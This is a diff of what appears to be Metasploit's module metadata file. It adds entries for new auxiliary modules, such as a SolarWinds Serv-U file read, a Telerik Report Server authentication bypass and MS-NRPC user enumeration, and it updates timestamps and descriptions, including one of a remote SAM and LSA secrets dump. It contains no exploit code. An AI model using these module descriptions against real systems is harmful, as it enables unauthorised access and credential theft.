@@ -23153,7 +23532,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2024-03-07 13:28:22 +0000",
+    "mod_time": "2024-06-18 17:39:06 +0000",
     "path": "/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.rb",
     "is_install_path": true,
     "ref_name": "gather/ldap_esc_vulnerable_cert_finder",
@@ -23175,7 +23554,9 @@
         "Certipy"
       ]
     },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
     "needs_cleanup": false,
     "actions": [
 
@@ -23208,7 +23589,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2024-01-07 15:02:53 +0000",
+    "mod_time": "2024-05-02 13:57:13 +0000",
     "path": "/modules/auxiliary/gather/ldap_hashdump.rb",
     "is_install_path": true,
     "ref_name": "gather/ldap_hashdump",
@@ -23226,7 +23607,9 @@
 
       ]
     },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
     "needs_cleanup": false,
     "actions": [
       {
@@ -23261,7 +23644,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2024-01-07 15:02:53 +0000",
+    "mod_time": "2024-05-02 13:57:13 +0000",
     "path": "/modules/auxiliary/gather/ldap_query.rb",
     "is_install_path": true,
     "ref_name": "gather/ldap_query",
@@ -23279,7 +23662,9 @@
 
       ]
     },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
     "needs_cleanup": false,
     "actions": [
       {
@@ -25139,6 +25524,70 @@
 
     ]
   },
+  "auxiliary_gather/rancher_authenticated_api_cred_exposure": {
+    "name": "Rancher Authenticated API Credential Exposure",
+    "fullname": "auxiliary/gather/rancher_authenticated_api_cred_exposure",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2022-08-18",
+    "type": "auxiliary",
+    "author": [
+      "h00die",
+      "Florian Struck",
+      "Marco Stuurman"
+    ],
+    "description": "An issue was discovered in Rancher versions up to and including\n          2.5.15 and 2.6.6 where sensitive fields, like passwords, API keys\n          and Ranchers service account token (used to provision clusters),\n          were stored in plaintext directly on Kubernetes objects like Clusters,\n          for example cluster.management.cattle.io. Anyone with read access to\n          those objects in the Kubernetes API could retrieve the plaintext\n          version of those sensitive data.",
+    "references": [
+      "URL-https://github.com/advisories/GHSA-g7j7-h4q8-8w2f",
+      "URL-https://github.com/fe-ax/tf-cve-2021-36782",
+      "URL-https://fe.ax/cve-2021-36782/",
+      "CVE-2021-36782"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-04-19 12:55:46 +0000",
+    "path": "/modules/auxiliary/gather/rancher_authenticated_api_cred_exposure.rb",
+    "is_install_path": true,
+    "ref_name": "gather/rancher_authenticated_api_cred_exposure",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
   "auxiliary_gather/redis_extractor": {
     "name": "Redis Extractor",
     "fullname": "auxiliary/gather/redis_extractor",
@@ -25744,6 +26193,68 @@
 
     ]
   },
+  "auxiliary_gather/solarwinds_servu_fileread_cve_2024_28995": {
+    "name": "SolarWinds Serv-U Unauthenticated Arbitrary File Read",
+    "fullname": "auxiliary/gather/solarwinds_servu_fileread_cve_2024_28995",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "sfewer-r7",
+      "Hussein Daher"
+    ],
+    "description": "This module exploits an unauthenticated file read vulnerability, due to directory traversal, affecting\n          SolarWinds Serv-U FTP Server 15.4, Serv-U Gateway 15.4, and Serv-U MFT Server 15.4. All versions prior to\n          the vendor supplied hotfix \"15.4.2 Hotfix 2\" (version 15.4.2.157) are affected.",
+    "references": [
+      "CVE-2024-28995",
+      "URL-https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28995",
+      "URL-https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-06-19 13:20:52 +0000",
+    "path": "/modules/auxiliary/gather/solarwinds_servu_fileread_cve_2024_28995.rb",
+    "is_install_path": true,
+    "ref_name": "gather/solarwinds_servu_fileread_cve_2024_28995",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
   "auxiliary_gather/splunk_raw_server_info": {
     "name": "Splunk __raw Server Info Disclosure ",
     "fullname": "auxiliary/gather/splunk_raw_server_info",
@@ -26212,7 +26723,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2023-04-12 13:09:34 +0000",
+    "mod_time": "2024-05-02 13:57:13 +0000",
     "path": "/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb",
     "is_install_path": true,
     "ref_name": "gather/vmware_vcenter_vmdir_ldap",
@@ -26230,7 +26741,9 @@
 
       ]
     },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
     "needs_cleanup": false,
     "actions": [
       {
@@ -26294,9 +26807,10 @@
     "type": "auxiliary",
     "author": [
       "Alberto Solino",
-      "Christophe De La Fuente"
+      "Christophe De La Fuente",
+      "antuache"
     ],
-    "description": "Dumps SAM hashes and LSA secrets (including cached creds) from the\n          remote Windows target without executing any agent locally. First, it\n          reads as much data as possible from the registry and then save the\n          hives locally on the target (%SYSTEMROOT%\\Temp\\random.tmp). Finally, it\n          downloads the temporary hive files and reads the rest of the data\n          from it. This temporary files are removed when it's done.\n\n          On domain controllers, secrets from Active Directory is extracted\n          using [MS-DRDS] DRSGetNCChanges(), replicating the attributes we need\n          to get SIDs, NTLM hashes, groups, password history, Kerberos keys and\n          other interesting data. Note that the actual `NTDS.dit` file is not\n          downloaded. Instead, the Directory Replication Service directly asks\n          Active Directory through RPC requests.\n\n          This modules takes care of starting or enabling the Remote Registry\n          service if needed. It will restore the service to its original state\n          when it's done.\n\n          This is a port of the great Impacket `secretsdump.py` code written by\n          Alberto Solino.",
+    "description": "Dumps SAM hashes and LSA secrets (including cached creds) from the\n          remote Windows target without executing any agent locally. This is\n          done by remotely updating the registry key security descriptor,\n          taking advantage of the WriteDACL privileges held by local\n          administrators to set temporary read permissions.\n\n          This can be disabled by setting the `INLINE` option to false and the\n          module will fallback to the original implementation, which consists\n          in saving the registry hives locally on the target\n          (%SYSTEMROOT%\\Temp\\<random>.tmp), downloading the temporary hive\n          files and reading the data from it. This temporary files are removed\n          when it's done.\n\n          On domain controllers, secrets from Active Directory is extracted\n          using [MS-DRDS] DRSGetNCChanges(), replicating the attributes we need\n          to get SIDs, NTLM hashes, groups, password history, Kerberos keys and\n          other interesting data. Note that the actual `NTDS.dit` file is not\n          downloaded. Instead, the Directory Replication Service directly asks\n          Active Directory through RPC requests.\n\n          This modules takes care of starting or enabling the Remote Registry\n          service if needed. It will restore the service to its original state\n          when it's done.\n\n          This is a port of the great Impacket `secretsdump.py` code written by\n          Alberto Solino.",
     "references": [
       "URL-https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py"
     ],
@@ -26312,7 +26826,7 @@
       "microsoft-ds"
     ],
     "targets": null,
-    "mod_time": "2024-03-06 14:20:34 +0000",
+    "mod_time": "2024-04-30 20:52:23 +0000",
     "path": "/modules/auxiliary/gather/windows_secrets_dump.rb",
     "is_install_path": true,
     "ref_name": "gather/windows_secrets_dump",
@@ -26886,7 +27400,7 @@
       "Yvain",
       "Grant Willcox"
     ],
-    "description": "The module use the ZoomEye API to search ZoomEye. ZoomEye is a search\n          engine for cyberspace that lets the user find specific network\n          components(ip, services, etc.).\n          Mind to enclose the whole request with quotes and limit the span of filters:\n          `set zoomeye_dork 'country:\"france\"+some+query'`\n\n          Setting facets will output a simple report on the overall search. It's values are:\n          Host search: app, device, service, os, port, country, city\n          Web search: webapp, component, framework, frontend, server, waf, os, country, city\n\n          Possible filters values are:\n          Host search: app, ver, device, os, service, ip, cidr, hostname, port, city, country, asn\n          Web search: app, header, keywords, desc, title, ip, site, city, country",
+    "description": "The module use the ZoomEye API to search ZoomEye. ZoomEye is a search\n          engine for cyberspace that lets the user find specific network\n          components(ip, services, etc.).\n\n          Setting facets will output a simple report on the overall search. It's values are:\n          Host search: app, device, service, os, port, country, city\n          Web search: webapp, component, framework, frontend, server, waf, os, country, city\n\n          Possible filters values are:\n          Host search: app, ver, device, os, service, ip, cidr, hostname, port, city, country, asn\n          Web search: app, header, keywords, desc, title, ip, site, city, country",
     "references": [
       "URL-https://github.com/knownsec/ZoomEye-python",
       "URL-https://www.zoomeye.org/api/doc",
@@ -26896,18 +27410,27 @@
     "arch": "",
     "rport": null,
     "autofilter_ports": [
-
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
     ],
     "autofilter_services": [
-
+      "http",
+      "https"
     ],
     "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2024-06-11 05:43:53 +0000",
     "path": "/modules/auxiliary/gather/zoomeye_search.rb",
     "is_install_path": true,
     "ref_name": "gather/zoomeye_search",
     "check": false,
-    "post_auth": true,
+    "post_auth": false,
     "default_credential": false,
     "notes": {
     },
@@ -27030,7 +27553,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2021-08-31 16:50:37 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/acpp/login.rb",
     "is_install_path": true,
     "ref_name": "scanner/acpp/login",
@@ -27072,7 +27595,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2024-01-07 15:02:53 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/afp/afp_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/afp/afp_login",
@@ -27435,7 +27958,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/db2/db2_auth.rb",
     "is_install_path": true,
     "ref_name": "scanner/db2/db2_auth",
@@ -27700,6 +28223,56 @@
 
     ]
   },
+  "auxiliary_scanner/dcerpc/nrpc_enumusers": {
+    "name": "MS-NRPC Domain Users Enumeration",
+    "fullname": "auxiliary/scanner/dcerpc/nrpc_enumusers",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Haidar Kabibo <https://x.com/haider_kabibo>"
+    ],
+    "description": "This module will enumerate valid Domain Users via no authentication against MS-NRPC interface.\n          It calls DsrGetDcNameEx2 to check if the domain user account exists or not. It has been tested with\n          Windows servers 2012, 2016, 2019 and 2022.",
+    "references": [
+      "URL-https://github.com/klsecservices/Publications/blob/master/A_journey_into_forgotten_Null_Session_and_MS-RPC_interfaces.pdf"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2024-06-24 16:06:38 +0000",
+    "path": "/modules/auxiliary/scanner/dcerpc/nrpc_enumusers.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/dcerpc/nrpc_enumusers",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
   "auxiliary_scanner/dcerpc/petitpotam": {
     "name": "PetitPotam",
     "fullname": "auxiliary/scanner/dcerpc/petitpotam",
@@ -28713,7 +29286,7 @@
       "ftp"
     ],
     "targets": null,
-    "mod_time": "2023-04-18 23:44:58 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/ftp/ftp_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/ftp/ftp_login",
@@ -29224,7 +29797,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/advantech_webaccess_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/advantech_webaccess_login",
@@ -29868,7 +30441,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2021-08-31 15:37:48 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/appletv_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/appletv_login",
@@ -30028,7 +30601,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/axis_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/axis_login",
@@ -30080,7 +30653,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2022-10-05 13:19:36 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/azure_ad_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/azure_ad_login",
@@ -30232,7 +30805,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/bavision_cam_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/bavision_cam_login",
@@ -30540,7 +31113,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/buffalo_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/buffalo_login",
@@ -30644,7 +31217,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/caidao_bruteforce_login",
@@ -30901,7 +31474,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2021-09-02 11:41:27 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/chef_webui_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/chef_webui_login",
@@ -31327,7 +31900,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/cisco_firepower_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/cisco_firepower_login",
@@ -32373,7 +32946,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/directadmin_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/directadmin_login",
@@ -34438,7 +35011,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/gitlab_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/gitlab_login",
@@ -34503,6 +35076,56 @@
 
     ]
   },
+  "auxiliary_scanner/http/gitlab_version": {
+    "name": "Gitlab Version Scanner",
+    "fullname": "auxiliary/scanner/http/gitlab_version",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Julien (jvoisin) Voisin"
+    ],
+    "description": "This module scans a Gitlab install for information about its version.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-04-24 10:20:59 +0000",
+    "path": "/modules/auxiliary/scanner/http/gitlab_version.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/gitlab_version",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
   "auxiliary_scanner/http/glassfish_login": {
     "name": "GlassFish Brute Force Utility",
     "fullname": "auxiliary/scanner/http/glassfish_login",
@@ -34540,7 +35163,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2021-09-02 11:41:27 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/glassfish_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/glassfish_login",
@@ -35296,7 +35919,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2021-09-02 11:41:27 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/hp_sys_mgmt_login",
@@ -35450,7 +36073,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2024-01-07 15:02:53 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/http_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/http_login",
@@ -36151,7 +36774,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/ipboard_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/ipboard_login",
@@ -36415,7 +37038,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2023-06-12 14:08:03 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/jenkins_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/jenkins_login",
@@ -36891,7 +37514,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2021-08-31 15:37:48 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/jupyter_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/jupyter_login",
@@ -37390,7 +38013,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2022-11-07 12:23:59 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/manageengine_desktop_central_login",
@@ -37915,7 +38538,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2021-08-31 16:50:37 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/mybook_live_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/mybook_live_login",
@@ -38385,7 +39008,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/octopusdeploy_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/octopusdeploy_login",
@@ -38957,7 +39580,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/phpmyadmin_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/phpmyadmin_login",
@@ -40509,7 +41132,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2023-02-28 15:40:03 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/softing_sis_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/softing_sis_login",
@@ -41210,7 +41833,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/symantec_web_gateway_login",
@@ -41260,7 +41883,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2022-09-16 13:34:06 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/syncovery_linux_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/syncovery_linux_login",
@@ -41320,7 +41943,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2022-12-14 08:59:53 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/syncovery_linux_token_cve_2022_36536",
@@ -41407,6 +42030,74 @@
 
     ]
   },
+  "auxiliary_scanner/http/telerik_report_server_auth_bypass": {
+    "name": "Telerik Report Server Auth Bypass",
+    "fullname": "auxiliary/scanner/http/telerik_report_server_auth_bypass",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2024-06-04",
+    "type": "auxiliary",
+    "author": [
+      "SinSinology",
+      "Spencer McIntyre"
+    ],
+    "description": "This module exploits an authentication bypass vulnerability in Telerik Report Server versions 10.0.24.305 and\n          prior which allows an unauthenticated attacker to create a new account with administrative privileges. The\n          vulnerability leverages the initial setup page which is still accessible once the setup process has completed.\n\n          If either USERNAME or PASSWORD are not specified, then a random value will be selected. The module will fail if\n          the specified USERNAME already exists.",
+    "references": [
+      "CVE-2024-4358",
+      "URL-https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 83,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-06-07 11:27:42 +0000",
+    "path": "/modules/auxiliary/scanner/http/telerik_report_server_auth_bypass.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/telerik_report_server_auth_bypass",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+      {
+        "name": "CHECK",
+        "description": "Check for the vulnerability"
+      },
+      {
+        "name": "EXPLOIT",
+        "description": "Exploit the vulnerability"
+      }
+    ]
+  },
   "auxiliary_scanner/http/thinvnc_traversal": {
     "name": "ThinVNC Directory Traversal",
     "fullname": "auxiliary/scanner/http/thinvnc_traversal",
@@ -41673,7 +42364,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2022-11-27 15:35:34 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/tomcat_mgr_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/tomcat_mgr_login",
@@ -42864,7 +43555,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2024-01-07 15:02:53 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/wordpress_multicall_creds",
@@ -43023,7 +43714,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/wordpress_xmlrpc_login",
@@ -44682,7 +45373,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2021-09-02 11:41:27 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/http/zabbix_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/zabbix_login",
@@ -45287,7 +45978,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2023-10-02 13:23:15 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
     "path": "/modules/auxiliary/scanner/ldap/ldap_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/ldap/ldap_login",
@@ -45973,7 +46664,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2022-07-01 12:22:31 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/misc/freeswitch_event_socket_login",
@@ -46705,7 +47396,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/mqtt/connect.rb",
     "is_install_path": true,
     "ref_name": "scanner/mqtt/connect",
@@ -47044,7 +47735,7 @@
       "sybase"
     ],
     "targets": null,
-    "mod_time": "2024-02-19 10:57:53 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
     "path": "/modules/auxiliary/scanner/mssql/mssql_hashdump.rb",
     "is_install_path": true,
     "ref_name": "scanner/mssql/mssql_hashdump",
@@ -47095,7 +47786,7 @@
       "sybase"
     ],
     "targets": null,
-    "mod_time": "2024-04-09 15:24:02 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
     "path": "/modules/auxiliary/scanner/mssql/mssql_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/mssql/mssql_login",
@@ -47122,7 +47813,7 @@
     "author": [
       "MC <mc@metasploit.com>"
     ],
-    "description": "This module simply queries the MSSQL instance for information.",
+    "description": "This module simply queries the MSSQL Browser service for server information.",
     "references": [
 
     ],
@@ -47144,7 +47835,7 @@
       "sybase"
     ],
     "targets": null,
-    "mod_time": "2019-03-05 03:38:51 +0000",
+    "mod_time": "2024-03-04 11:44:04 +0000",
     "path": "/modules/auxiliary/scanner/mssql/mssql_ping.rb",
     "is_install_path": true,
     "ref_name": "scanner/mssql/mssql_ping",
@@ -47193,7 +47884,7 @@
       "sybase"
     ],
     "targets": null,
-    "mod_time": "2024-02-19 10:57:53 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
     "path": "/modules/auxiliary/scanner/mssql/mssql_schemadump.rb",
     "is_install_path": true,
     "ref_name": "scanner/mssql/mssql_schemadump",
@@ -47210,6 +47901,57 @@
 
     ]
   },
+  "auxiliary_scanner/mssql/mssql_version": {
+    "name": "MSSQL Version Utility",
+    "fullname": "auxiliary/scanner/mssql/mssql_version",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Zach Goldman"
+    ],
+    "description": "Executes a TDS7 pre-login request against the MSSQL instance to query for version information.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 1433,
+    "autofilter_ports": [
+      1433,
+      1434,
+      1435,
+      14330,
+      2533,
+      9152,
+      2638
+    ],
+    "autofilter_services": [
+      "ms-sql-s",
+      "ms-sql2000",
+      "sybase"
+    ],
+    "targets": null,
+    "mod_time": "2024-04-22 14:46:50 +0000",
+    "path": "/modules/auxiliary/scanner/mssql/mssql_version.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/mssql/mssql_version",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": [
+      "mssql"
+    ],
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
   "auxiliary_scanner/mysql/mysql_authbypass_hashdump": {
     "name": "MySQL Authentication Bypass Password Dump",
     "fullname": "auxiliary/scanner/mysql/mysql_authbypass_hashdump",
@@ -47367,7 +48109,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2024-04-10 12:24:08 +0000",
+    "mod_time": "2024-05-21 11:00:24 +0000",
     "path": "/modules/auxiliary/scanner/mysql/mysql_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/mysql/mysql_login",
@@ -47628,7 +48370,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2023-05-11 13:01:46 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/nessus/nessus_rest_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/nessus/nessus_rest_login",
@@ -49104,7 +49846,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
     "path": "/modules/auxiliary/scanner/pop3/pop3_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/pop3/pop3_login",
@@ -49523,7 +50265,7 @@
       "postgres"
     ],
     "targets": null,
-    "mod_time": "2024-04-09 15:24:02 +0000",
